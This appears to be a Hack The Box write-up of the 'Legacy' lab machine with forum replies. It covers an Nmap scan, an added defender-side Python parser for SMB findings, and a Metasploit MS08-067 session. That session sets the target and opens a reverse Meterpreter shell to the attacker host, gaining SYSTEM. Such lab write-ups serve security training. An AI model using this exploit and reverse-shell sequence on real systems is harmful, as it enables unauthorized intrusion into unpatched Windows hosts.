Legacy write-up by Arrexel

## Enumeration
Start off with our handy-dandy Nmap scan (aggressive mode `-A`: version detection, OS detection, script scan and traceroute):

### Nmap

```
nmap -T4 -A -v 10.10.10.4
```

```
Starting Nmap 7.60 ( https://nmap.org ) at 2017-09-17 16:15 EDT
NSE: Loaded 146 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 16:15
Completed NSE at 16:15, 0.00s elapsed
Initiating NSE at 16:15
Completed NSE at 16:15, 0.00s elapsed
Initiating Ping Scan at 16:15
Scanning 10.10.10.4 [4 ports]
Completed Ping Scan at 16:15, 0.22s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 16:15
Completed Parallel DNS resolution of 1 host. at 16:15, 0.02s elapsed
Initiating SYN Stealth Scan at 16:15
Scanning 10.10.10.4 [1000 ports]
Discovered open port 139/tcp on 10.10.10.4
Discovered open port 445/tcp on 10.10.10.4
Completed SYN Stealth Scan at 16:15, 9.39s elapsed (1000 total ports)
Initiating Service scan at 16:15
Scanning 2 services on 10.10.10.4
Completed Service scan at 16:15, 6.46s elapsed (2 services on 1 host)
Initiating OS detection (try #1) against 10.10.10.4
Retrying OS detection (try #2) against 10.10.10.4
Initiating Traceroute at 16:15
Completed Traceroute at 16:15, 0.13s elapsed
Initiating Parallel DNS resolution of 2 hosts. at 16:15
Completed Parallel DNS resolution of 2 hosts. at 16:15, 0.02s elapsed
NSE: Script scanning 10.10.10.4.
Initiating NSE at 16:15
Completed NSE at 16:20, 251.11s elapsed
Initiating NSE at 16:20
Completed NSE at 16:20, 0.00s elapsed
Nmap scan report for 10.10.10.4
Host is up (0.12s latency).
Not shown: 997 filtered ports
PORT     STATE  SERVICE       VERSION
139/tcp  open   netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open   microsoft-ds  Windows XP microsoft-ds
3389/tcp closed ms-wbt-server
Device type: general purpose|specialized|media device
Running (JUST GUESSING): Microsoft Windows 2000|XP|2003|PocketPC/CE (91%), General Dynamics embedded (85%), Cisco embedded (85%), Motorola embedded (85%)
OS CPE: cpe:/o:microsoft:windows_2000 cpe:/o:microsoft:windows_xp::sp2 cpe:/o:microsoft:windows_server_2003 cpe:/h:cisco:isb7150 cpe:/o:microsoft:windows_ce:5.0 cpe:/h:motorola:vip1200
Aggressive OS guesses: Microsoft Windows 2000 Server (91%), Microsoft Windows XP SP2 (91%), Microsoft Windows XP SP2 or Windows Small Business Server 2003 (91%), Microsoft Windows 2000 SP4 or Windows XP SP2 or SP3 (91%), Microsoft Windows 2000 SP2 (89%), Microsoft Windows Server 2003 (89%), Microsoft Windows XP SP3 (89%), Microsoft Windows 2000 SP4 (89%), Microsoft Windows XP Professional SP3 (89%), Microsoft Windows XP SP2 or SP3 (89%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=260 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp

Host script results:
|_clock-skew: mean: -3h00m02s, deviation: 0s, median: -3h00m02s
| nbstat: NetBIOS name: LEGACY, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:aa:30:6d (VMware)
| Names:
|   LEGACY<00>           Flags: <unique><active>
|   HTB<00>              Flags: <group><active>
|   LEGACY<20>           Flags: <unique><active>
|   HTB<1e>              Flags: <group><active>
|   HTB<1d>              Flags: <unique><active>
|_  \x01\x02__MSBROWSE__\x02<01>  Flags: <group><active>
| smb-os-discovery: 
|   OS: Windows XP (Windows 2000 LAN Manager)
|   OS CPE: cpe:/o:microsoft:windows_xp::-
|   Computer name: legacy
|   NetBIOS computer name: LEGACY\x00
|   Workgroup: HTB\x00
|_  System time: 2017-09-17T20:15:47+03:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)

TRACEROUTE (using port 3389/tcp)
HOP RTT       ADDRESS
1   123.57 ms 10.10.14.1
2   122.34 ms 10.10.10.4

NSE: Script Post-scanning.
Initiating NSE at 16:20
Completed NSE at 16:20, 0.00s elapsed
Initiating NSE at 16:20
Completed NSE at 16:20, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 275.83 seconds
           Raw packets sent: 2101 (97.178KB) | Rcvd: 64 (3.774KB)
```

There isn’t too much going on here: only NetBIOS (139) and Microsoft-DS/SMB (445) are open. Both the service banner and the `smb-os-discovery` script say the system is running Windows XP, so this should be a walk in the park.
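From the defender’s side, the host-script block above already tells the whole story (end-of-life OS, SMB signing off, guest session accepted, SMBv1 only). As an added example that is not part of Arrexel’s write-up, this Python script parses that Nmap host-script output into findings to triage; the sample input is constructed from the fields shown in the scan above, and the end-of-life list is an assumption the defender would maintain.

```python
# Added example, not from the original write-up: turn the Nmap host-script block
# above into defender-side findings. Sample input constructed from that scan.
import re

SAMPLE_NSE = """\
| smb-os-discovery:
|   OS: Windows XP (Windows 2000 LAN Manager)
|   Computer name: legacy
|   Workgroup: HTB\\x00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|_  message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)
"""

# Windows releases out of security support (assumption: the defender keeps this list current).
END_OF_LIFE = ("Windows 2000", "Windows XP", "Windows Server 2003")

SCRIPT_LINE = re.compile(r"^\|_? ?([\w-]+):\s*(.*)$")   # "| smb-os-discovery:" or "|_smb2-time: value"
KEY_LINE = re.compile(r"^\|_?\s{2,}([^:]+?):\s*(.+)$")  # "|   OS: Windows XP ..." (indented key: value)


def parse_nse(text):
    """Return {script_name: {key: value}}; a script's own inline value is stored under '_'."""
    scripts, current = {}, None
    for line in text.splitlines():
        m = SCRIPT_LINE.match(line)
        if m:  # new script header: start (or reuse) its dictionary
            current = scripts.setdefault(m.group(1), {"_": m.group(2).strip()} if m.group(2) else {})
            continue
        m = KEY_LINE.match(line)
        if m and current is not None:
            current[m.group(1).strip()] = m.group(2).strip()
    return scripts


def smb_findings(scripts):
    """Map the parsed SMB scripts to (severity, description) findings for triage."""
    findings = []
    os_name = scripts.get("smb-os-discovery", {}).get("OS", "")
    sec = scripts.get("smb-security-mode", {})
    if any(eol in os_name for eol in END_OF_LIFE):
        findings.append(("HIGH", f"unsupported OS exposed over SMB: {os_name}"))
    if sec.get("message_signing", "").startswith("disabled"):
        findings.append(("MEDIUM", "SMB message signing disabled (relay/tampering risk)"))
    if sec.get("account_used") == "guest":
        findings.append(("MEDIUM", "SMB guest/null session accepted"))
    if "failed" in scripts.get("smb2-time", {}).get("_", ""):
        findings.append(("INFO", "SMB2 negotiation failed: host speaks SMBv1 only"))
    return findings
```

Feed it the `Host script results:` section of any `-A` or `--script smb-*` scan; `smb_findings(parse_nse(text))` returns the findings in severity order.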

## Exploitation
A quick search for Windows XP SMB vulnerabilities gets us CVE-2008-4250 (MS08-067), which has a Metasploit module. How convenient! Let’s try it.

`exploit/windows/smb/ms08_067_netapi`

Note that target 7 is Windows XP SP3 English for me, although the numbering may differ between Metasploit versions; run `show targets` to list all available targets.

```
msf exploit(usermap_script) > use exploit/windows/smb/ms08_067_netapi 
msf exploit(ms08_067_netapi) > show options

Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST                     yes       The target address
   RPORT    445              yes       The SMB service port (TCP)
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)


Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting


msf exploit(ms08_067_netapi) > set rhost 10.10.10.4
rhost => 10.10.10.4
msf exploit(ms08_067_netapi) > set target 7
target => 7
msf exploit(ms08_067_netapi) > run

[*] Started reverse TCP handler on 10.10.14.3:4444 
[*] 10.10.10.4:445 - Automatically detecting the target...
[*] 10.10.10.4:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 10.10.10.4:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 10.10.10.4:445 - Attempting to trigger the vulnerability...
[*] Sending stage (171583 bytes) to 10.10.10.4
[*] Meterpreter session 1 opened (10.10.14.3:4444 -> 10.10.10.4:1035) at 2017-09-17 16:24:57 -0400
[+] negotiating tlv encryption

meterpreter > pwd
C:\Documents and Settings\Administrator\Desktop
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
```

We’re in! Grab the flags from `C:\Documents and Settings\john\Desktop\user.txt` and `C:\Documents and Settings\Administrator\Desktop\root.txt` and call it a day.

Many members encountered problems using this exploit because (in older Metasploit versions) the fingerprinting part doesn’t work. Therefore, they had to guess the correct target version for the exploit, and this guessing would result in crashing the box most of the time.

@alamot said:
> Many members encountered problems using this exploit because (in older Metasploit versions) the fingerprinting part doesn’t work. Therefore, they had to guess the correct target version for the exploit, and this guessing would result in crashing the box most of the time.

Thanks, modified it to account for proper target selection.

Nice quick write up :D.

Good job.

Did anyone find a working exploit for this? I tried a lot, but none of them worked :frowning:

When I do Nmap scanning I get an “all ports are filtered” statement. I’ve been enumerating all the boxes in HTB but I’m getting the same problem. How do I proceed further?

@3zculprit said:
> When I do Nmap scanning I get an “all ports are filtered” statement. I’ve been enumerating all the boxes in HTB but I’m getting the same problem. How do I proceed further?

In case anyone else has this problem, reset the box. I tried an exploit for the wrong service pack which immediately caused the ports to report as “filtered”. Connecting with smbclient also gave an error, so I figure it causes some kind of crash. Resetting fixes this.

Thanks @Arrexel for the nice walkthrough. Is there a technique to enumerate SMB without the Metasploit module? Please advise.